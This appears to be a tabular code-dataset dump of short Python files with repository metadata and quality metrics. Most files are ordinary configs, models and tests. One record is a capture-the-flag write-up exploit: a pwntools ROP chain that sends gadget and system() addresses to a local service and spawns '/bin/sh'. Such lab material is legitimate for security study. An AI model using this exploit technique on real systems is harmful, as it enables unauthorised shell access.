hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
7a8e4bbe77573044dc32a4127a4bbb4d91a902d1 | 649 | py | Python | library/lib_study/159_debug_trace.py | gottaegbert/penter | 8cbb6be3c4bf67c7c69fa70e597bfbc3be4f0a2d | [
"MIT"
] | 13 | 2020-01-04T07:37:38.000Z | 2021-08-31T05:19:58.000Z | library/lib_study/159_debug_trace.py | gottaegbert/penter | 8cbb6be3c4bf67c7c69fa70e597bfbc3be4f0a2d | [
"MIT"
] | 3 | 2020-06-05T22:42:53.000Z | 2020-08-24T07:18:54.000Z | library/lib_study/159_debug_trace.py | gottaegbert/penter | 8cbb6be3c4bf67c7c69fa70e597bfbc3be4f0a2d | [
"MIT"
] | 9 | 2020-10-19T04:53:06.000Z | 2021-08-31T05:20:01.000Z | # python -m trace --count -C . somefile.py
# https://docs.python.org/zh-cn/3/library/trace.html
# python 用trace调试编译 python -m trace --trace 159_debug_trace.py
def main():
print("xxxxx")
main()
# import sys
# import trace
# # create a Trace object, telling it what to ignore, and whether to
# # do tracing or line-counting or both.
# tracer = trace.Trace(
# ignoredirs=[sys.prefix, sys.exec_prefix],
# trace=0,
# count=1)
#
# # run the new command using the given tracer
# tracer.run('main()')
#
# # make a report, placing output in the current directory
# r = tracer.results()
# r.write_results(show_missing=True, coverdir=".")
| 24.037037 | 68 | 0.684129 | 98 | 649 | 4.479592 | 0.673469 | 0.031891 | 0.05467 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011215 | 0.175655 | 649 | 26 | 69 | 24.961538 | 0.809346 | 0.87057 | 0 | 0 | 0 | 0 | 0.083333 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0 | 0 | 0 | 0.333333 | 0.333333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
7a917601f43966f35d030de0a4f74845b051da5b | 78 | py | Python | bandoleers/__init__.py | ibnpaul/bandoleers | 22398b134be40abd9a08f121f342923675b9fb52 | [
"BSD-3-Clause"
] | null | null | null | bandoleers/__init__.py | ibnpaul/bandoleers | 22398b134be40abd9a08f121f342923675b9fb52 | [
"BSD-3-Clause"
] | null | null | null | bandoleers/__init__.py | ibnpaul/bandoleers | 22398b134be40abd9a08f121f342923675b9fb52 | [
"BSD-3-Clause"
] | null | null | null | version_info = (3, 1, 0)
__version__ = '.'.join(str(s) for s in version_info)
| 26 | 52 | 0.666667 | 14 | 78 | 3.285714 | 0.714286 | 0.478261 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.045455 | 0.153846 | 78 | 2 | 53 | 39 | 0.651515 | 0 | 0 | 0 | 0 | 0 | 0.012821 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
8f8e5a2db87b4f600f71ff1e66c1b14a995f8c2b | 215 | py | Python | Testes Basicos/built_in_functions.py | gustavoLuuD/estudos_python | c8d3e97913d8fc2d046c7a1942b24800779438f5 | [
"MIT"
] | null | null | null | Testes Basicos/built_in_functions.py | gustavoLuuD/estudos_python | c8d3e97913d8fc2d046c7a1942b24800779438f5 | [
"MIT"
] | null | null | null | Testes Basicos/built_in_functions.py | gustavoLuuD/estudos_python | c8d3e97913d8fc2d046c7a1942b24800779438f5 | [
"MIT"
] | null | null | null | value = 74.55
value2 = 74.3
value4 = -100
print(f"O valor 1 é {round(value)} e o valor 2 {round(value2)}")
print(f"O valor 1 também é {int(value)}")
print(f"O valor absoluto de {value4} é {abs(value4)}")
print(3//2) | 30.714286 | 64 | 0.665116 | 44 | 215 | 3.25 | 0.477273 | 0.167832 | 0.146853 | 0.251748 | 0.181818 | 0 | 0 | 0 | 0 | 0 | 0 | 0.10929 | 0.148837 | 215 | 7 | 65 | 30.714286 | 0.672131 | 0 | 0 | 0 | 0 | 0 | 0.597222 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.571429 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 3 |
8f9ca99ab0d124af304b5e47ede7f6a170ae873f | 1,920 | py | Python | flaskr_carved_rock/models/user.py | ron4u1998/flaskr-carved-rock | 82d0e947e147c209bb799ad049653fea72ea678a | [
"BSD-3-Clause"
] | null | null | null | flaskr_carved_rock/models/user.py | ron4u1998/flaskr-carved-rock | 82d0e947e147c209bb799ad049653fea72ea678a | [
"BSD-3-Clause"
] | null | null | null | flaskr_carved_rock/models/user.py | ron4u1998/flaskr-carved-rock | 82d0e947e147c209bb799ad049653fea72ea678a | [
"BSD-3-Clause"
] | null | null | null | from uuid import uuid4
from sqlalchemy.orm import validates
from werkzeug.security import check_password_hash, generate_password_hash
from flaskr_carved_rock.login import login_manager
from flaskr_carved_rock.sqla import sqla
from flask_login import UserMixin
class User(UserMixin, sqla.Model):
id = sqla.Column(sqla.Integer, primary_key=True)
uuid = sqla.Column(sqla.String(64), nullable=False, default=lambda: str(uuid4()))
username = sqla.Column(sqla.Text, nullable=False, unique=True)
password = sqla.Column(sqla.Text, nullable=False)
api_key = sqla.Column(sqla.String(64), nullable=True) # use a UUID
@validates('username', 'password')
def validate_not_empty(self, key, value):
if not value:
raise ValueError(f'{key.capitalize()} is required.')
if key == 'username':
self.validate_unique(key, value, f'{value} already registered')
if key == 'password':
value = generate_password_hash(value)
return value
def validate_unique(self, key, value, error_message=None):
if (
User.query.filter_by(**{key: value}).first()
is not None
):
if not error_message:
error_message = f'{key} must be unique.'
raise ValueError(error_message)
return value
def correct_password(self, plaintext):
return check_password_hash(self.password, plaintext)
def get_id(self):
return self.uuid
def __repr__(self):
return self.username
@login_manager.user_loader
def load_user(user_uuid):
return User.query.filter_by(uuid=user_uuid).first()
@login_manager.request_loader
def load_user_from_request(request):
api_key = request.headers.get('x-api-key')
if api_key:
user = User.query.filter_by(api_key=api_key).first()
if user:
return user
return None | 30.967742 | 85 | 0.66875 | 251 | 1,920 | 4.928287 | 0.306773 | 0.029103 | 0.056589 | 0.041229 | 0.098626 | 0.098626 | 0 | 0 | 0 | 0 | 0 | 0.004071 | 0.232292 | 1,920 | 62 | 86 | 30.967742 | 0.835142 | 0.005208 | 0 | 0.042553 | 1 | 0 | 0.062336 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.148936 | false | 0.148936 | 0.12766 | 0.085106 | 0.574468 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 3 |
8fa3e70caa9d6c7c6d647e37d83f168d380b17f5 | 167 | py | Python | slackchatbakery/views/arguments/notification.py | The-Politico/django-politico-slackchat-2018-midterms-bakery | 77b82ce95f510c142254332255adc615833bcffb | [
"MIT"
] | null | null | null | slackchatbakery/views/arguments/notification.py | The-Politico/django-politico-slackchat-2018-midterms-bakery | 77b82ce95f510c142254332255adc615833bcffb | [
"MIT"
] | 9 | 2018-10-19T20:12:23.000Z | 2021-06-08T19:30:27.000Z | slackchatbakery/views/arguments/notification.py | The-Politico/django-politico-slackchat-2018-midterms-bakery | 77b82ce95f510c142254332255adc615833bcffb | [
"MIT"
] | null | null | null | from .base import BaseArgument
class Notification(BaseArgument):
name = "slackchatbakery-notification"
arg = "notification"
path = "stubs/notification/"
| 20.875 | 41 | 0.730539 | 15 | 167 | 8.133333 | 0.733333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.173653 | 167 | 7 | 42 | 23.857143 | 0.884058 | 0 | 0 | 0 | 0 | 0 | 0.353293 | 0.167665 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.2 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 3 |
8fb2b6f222d8f600f24fa8ae2c22e884a4891fca | 456 | py | Python | dueros/directive/VideoPlayer/VideoStop.py | ayxue/BaiduSaxoOpenAPI | d042366bb33ebdc4471b29e167b01c4cb7cb298d | [
"Apache-2.0"
] | null | null | null | dueros/directive/VideoPlayer/VideoStop.py | ayxue/BaiduSaxoOpenAPI | d042366bb33ebdc4471b29e167b01c4cb7cb298d | [
"Apache-2.0"
] | null | null | null | dueros/directive/VideoPlayer/VideoStop.py | ayxue/BaiduSaxoOpenAPI | d042366bb33ebdc4471b29e167b01c4cb7cb298d | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python3
# -*- encoding=utf-8 -*-
# description:
# author:jack
# create_time: 2018/7/13
"""
desc:pass
"""
from dueros.directive.BaseDirective import BaseDirective
from dueros.directive.AudioPlayer.PlayBehaviorEnum import PlayBehaviorEnum
from dueros.Utils import Utils
class VideoStop(BaseDirective):
def __init__(self):
super(VideoStop, self).__init__('VideoPlayer.Stop')
pass
if __name__ == '__main__':
pass | 17.538462 | 74 | 0.721491 | 52 | 456 | 6 | 0.692308 | 0.096154 | 0.121795 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.023438 | 0.157895 | 456 | 26 | 75 | 17.538462 | 0.789063 | 0.223684 | 0 | 0.222222 | 0 | 0 | 0.070796 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0.222222 | 0.333333 | 0 | 0.555556 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 0 | 3 |
8ff12f6df682241b328db019b6ead4ffb89e48ff | 128 | py | Python | pelicanconf_local.example.py | marcus-clements/pelican-netlify-cms | 0970c6d011301acec6feaf6d4391dcd8f983ef8d | [
"MIT"
] | null | null | null | pelicanconf_local.example.py | marcus-clements/pelican-netlify-cms | 0970c6d011301acec6feaf6d4391dcd8f983ef8d | [
"MIT"
] | null | null | null | pelicanconf_local.example.py | marcus-clements/pelican-netlify-cms | 0970c6d011301acec6feaf6d4391dcd8f983ef8d | [
"MIT"
] | 2 | 2020-05-17T00:49:23.000Z | 2020-05-21T11:39:56.000Z | LOAD_CONTENT_CACHE = False
# Uncomment following line if you want document-relative URLs when developing
#RELATIVE_URLS = True
| 25.6 | 77 | 0.820313 | 18 | 128 | 5.666667 | 0.888889 | 0.235294 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.140625 | 128 | 4 | 78 | 32 | 0.927273 | 0.742188 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
890651116b57bf07c975675fcb0152f690cec2d3 | 1,236 | py | Python | pwn/ROP/arr/writeup/exploit.py | roytu/challs2 | c087d802961451fce21ccaf9b4d908711233dda8 | [
"MIT"
] | null | null | null | pwn/ROP/arr/writeup/exploit.py | roytu/challs2 | c087d802961451fce21ccaf9b4d908711233dda8 | [
"MIT"
] | null | null | null | pwn/ROP/arr/writeup/exploit.py | roytu/challs2 | c087d802961451fce21ccaf9b4d908711233dda8 | [
"MIT"
] | null | null | null | from pwn import *
ppr = 0x80487ba
sysAddr = 0x8048430
scanf = 0x8048460
storage = 0x804999c
strFmtStr = 0x804882f
current = -2147483635
con = remote('localhost',1234)
con.sendline( "kablaa")
print "sending scanf..."
sleep(1)
con.sendline( str(current))
con.sendline(str(scanf))
current = current+1
print "sending ppr..."
sleep(1)
con.sendline( str(current))
con.sendline( str(ppr))
current = current+1
print "sending format string..."
sleep(1)
con.sendline( str(current))
con.sendline( str(strFmtStr))
current = current+1
print "sending storage address..."
sleep(1)
con.sendline( str(current))
con.sendline( str(storage))
current = current+1
print "sending system address.."
sleep(1)
con.sendline( str(current))
con.sendline( str(sysAddr))
current = current+1
print "sending junk return address..."
sleep(1)
con.sendline( str(current))
con.sendline( str(0xdeadbeef))
current = current+1
print "sending addrss of comand..."
sleep(1)
con.sendline( str(current))
con.sendline( str(storage))
current = current+1
print "sending the other values"
sleep(1)
con.sendline( str(2))
con.sendline( str(2))
con.sendline( str(2))
con.sendline( str(2))
con.sendline( str(2))
con.sendline( str(2))
con.sendline("/bin/sh")
con.interactive()
| 18.447761 | 38 | 0.727346 | 178 | 1,236 | 5.050562 | 0.241573 | 0.269188 | 0.311457 | 0.151279 | 0.68743 | 0.53059 | 0.53059 | 0.53059 | 0.53059 | 0.393771 | 0 | 0.065814 | 0.114887 | 1,236 | 66 | 39 | 18.727273 | 0.755942 | 0 | 0 | 0.555556 | 0 | 0 | 0.167611 | 0 | 0 | 0 | 0.044534 | 0 | 0 | 0 | null | null | 0 | 0.018519 | null | null | 0.148148 | 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
890884d403a44bf6e359a34cc5b3da6b4e1ecb25 | 92 | py | Python | Knight-Rank/DAY-5/114A.py | rohansaini886/Peer-Programming-Hub-CP-Winter_Camp | d27fb6aa7e726e6d2cb95270c9e644d38d64dd1c | [
"MIT"
] | 2 | 2021-12-09T18:07:46.000Z | 2022-01-26T16:51:18.000Z | Knight-Rank/DAY-5/114A.py | rohansaini886/Peer-Programming-Hub-CP-Winter_Camp | d27fb6aa7e726e6d2cb95270c9e644d38d64dd1c | [
"MIT"
] | null | null | null | Knight-Rank/DAY-5/114A.py | rohansaini886/Peer-Programming-Hub-CP-Winter_Camp | d27fb6aa7e726e6d2cb95270c9e644d38d64dd1c | [
"MIT"
] | null | null | null | I=input
k=int(I())
l=int(I())
r=1
while k**r<l:r+=1
print(['NO','YES\n'+str(r-1)][k**r==l])
| 13.142857 | 39 | 0.51087 | 26 | 92 | 1.807692 | 0.5 | 0.12766 | 0.12766 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.035294 | 0.076087 | 92 | 6 | 40 | 15.333333 | 0.517647 | 0 | 0 | 0 | 0 | 0 | 0.076087 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.166667 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
8f18a459d761f3565f775b85fc15f7f49722a8e4 | 448 | py | Python | test/ontology/__init__.py | eigendude/pysosa | d645e484d2d588504ab8fbdfcd6584209d903fef | [
"BSD-3-Clause"
] | null | null | null | test/ontology/__init__.py | eigendude/pysosa | d645e484d2d588504ab8fbdfcd6584209d903fef | [
"BSD-3-Clause"
] | null | null | null | test/ontology/__init__.py | eigendude/pysosa | d645e484d2d588504ab8fbdfcd6584209d903fef | [
"BSD-3-Clause"
] | null | null | null | ################################################################################
#
# Copyright (C) 2019 Garrett Brown
# This file is part of pysosa - https://github.com/eigendude/pysosa
#
# SPDX-License-Identifier: BSD-3-Clause
# See the file LICENSE for more information.
#
################################################################################
from .ontology_factory_test import OntologyFactoryTest
from .sosa_test import SOSATest
| 34.461538 | 80 | 0.491071 | 40 | 448 | 5.425 | 0.85 | 0.092166 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012376 | 0.098214 | 448 | 12 | 81 | 37.333333 | 0.524752 | 0.40625 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 3 |
8f3030bc43d74cdae77b5cb7a2c739e35bc810eb | 295 | py | Python | configs/pspnet/pspnet_r50-d8_yantai_st12.py | shuaizzZ/mmsegmentation | a6c6b348dbf8c4a0a39ffbdb832a1e82309c533c | [
"Apache-2.0"
] | null | null | null | configs/pspnet/pspnet_r50-d8_yantai_st12.py | shuaizzZ/mmsegmentation | a6c6b348dbf8c4a0a39ffbdb832a1e82309c533c | [
"Apache-2.0"
] | null | null | null | configs/pspnet/pspnet_r50-d8_yantai_st12.py | shuaizzZ/mmsegmentation | a6c6b348dbf8c4a0a39ffbdb832a1e82309c533c | [
"Apache-2.0"
] | null | null | null | _base_ = [
'../_base_/models/du_pspnet_r50-d8.py', '../_base_/datasets/yantai_st12.py',
'../_base_/runtimes/yantai_runtime.py', '../_base_/schedules/schedule_yantai.py'
]
model = dict(
decode_head=dict(num_classes=4), auxiliary_head=dict(num_classes=4))
test_cfg = dict(mode='whole') | 42.142857 | 84 | 0.715254 | 42 | 295 | 4.547619 | 0.619048 | 0.094241 | 0.115183 | 0.188482 | 0.198953 | 0 | 0 | 0 | 0 | 0 | 0 | 0.026119 | 0.091525 | 295 | 7 | 85 | 42.142857 | 0.686567 | 0 | 0 | 0 | 0 | 0 | 0.5 | 0.483108 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
8f503e25fa8ba64b0a369b2aaaa138d8e45ad961 | 20 | py | Python | tests/core_symbol.py | cubetrain/CubeTrain | b930a3e88e941225c2c54219267f743c790e388f | [
"MIT"
] | null | null | null | tests/core_symbol.py | cubetrain/CubeTrain | b930a3e88e941225c2c54219267f743c790e388f | [
"MIT"
] | null | null | null | tests/core_symbol.py | cubetrain/CubeTrain | b930a3e88e941225c2c54219267f743c790e388f | [
"MIT"
] | null | null | null | CORE_SYMBOL='SEAT'
| 10 | 19 | 0.75 | 3 | 20 | 4.666667 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.1 | 20 | 1 | 20 | 20 | 0.777778 | 0 | 0 | 0 | 0 | 0 | 0.210526 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
8f7a5cb0eb1d44c1a8768d02ea571d4cb3b2f950 | 110 | py | Python | ariadne_django/__init__.py | drewsynan/ariadne_django | 836b783a7240eed0ee03b7db1bbb7c5ff2843fb4 | [
"BSD-3-Clause"
] | 34 | 2021-04-08T15:36:14.000Z | 2022-03-22T14:30:28.000Z | ariadne_django/__init__.py | drewsynan/ariadne_django | 836b783a7240eed0ee03b7db1bbb7c5ff2843fb4 | [
"BSD-3-Clause"
] | 34 | 2021-04-08T02:17:25.000Z | 2022-03-22T12:25:41.000Z | ariadne_django/__init__.py | drewsynan/ariadne_django | 836b783a7240eed0ee03b7db1bbb7c5ff2843fb4 | [
"BSD-3-Clause"
] | 11 | 2021-04-08T16:47:36.000Z | 2022-03-26T23:25:39.000Z | import django
if django.VERSION < (3, 2):
default_app_config = "ariadne_django.apps.AriadneDjangoConfig"
| 22 | 66 | 0.763636 | 14 | 110 | 5.785714 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.021053 | 0.136364 | 110 | 4 | 67 | 27.5 | 0.831579 | 0 | 0 | 0 | 0 | 0 | 0.354545 | 0.354545 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 0.333333 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 3 |
56b0ae473eaa877406bacaa1f58eac9a2aa1929e | 301 | py | Python | cloudrail/knowledge/context/aws/networking_config/inetwork_configuration.py | my-devops-info/cloudrail-knowledge | b7c1bbd6fe1faeb79c105a01c0debbe24d031a0e | [
"MIT"
] | null | null | null | cloudrail/knowledge/context/aws/networking_config/inetwork_configuration.py | my-devops-info/cloudrail-knowledge | b7c1bbd6fe1faeb79c105a01c0debbe24d031a0e | [
"MIT"
] | null | null | null | cloudrail/knowledge/context/aws/networking_config/inetwork_configuration.py | my-devops-info/cloudrail-knowledge | b7c1bbd6fe1faeb79c105a01c0debbe24d031a0e | [
"MIT"
] | null | null | null | from abc import abstractmethod
from typing import List
from cloudrail.knowledge.context.aws.networking_config.network_configuration import NetworkConfiguration
class INetworkConfiguration:
@abstractmethod
def get_all_network_configurations(self) -> List[NetworkConfiguration]:
pass
| 27.363636 | 104 | 0.82392 | 31 | 301 | 7.83871 | 0.741935 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.129568 | 301 | 10 | 105 | 30.1 | 0.927481 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0.142857 | 0.428571 | 0 | 0.714286 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 0 | 3 |
56b532a63744e31c6a636400a74ee6dcf3696e2b | 5,343 | py | Python | tests/console/input/testinput.py | LowieHuyghe/scriptcore | 0c9d94b353d4d149db9492eb4ae0aa87cc1e082c | [
"Apache-2.0"
] | null | null | null | tests/console/input/testinput.py | LowieHuyghe/scriptcore | 0c9d94b353d4d149db9492eb4ae0aa87cc1e082c | [
"Apache-2.0"
] | 6 | 2017-02-23T13:22:31.000Z | 2018-07-06T04:51:06.000Z | tests/console/input/testinput.py | LowieHuyghe/scriptcore | 0c9d94b353d4d149db9492eb4ae0aa87cc1e082c | [
"Apache-2.0"
] | null | null | null |
from scriptcore.testing.testcase import TestCase
from scriptcore.console.input.input import Input
import mock
import sys
class TestInput(TestCase):
def test_default(self):
"""
Test default input
:return: void
"""
description = self.rand_str()
description2 = self.rand_str()
input = Input()
with mock.patch(self._get_pathable_input(), return_value='e8n0dpankpdvdni3kgac'):
value = input(description)
self.assert_in(description, self.stdout.getvalue())
self.assert_equal('e8n0dpankpdvdni3kgac', value)
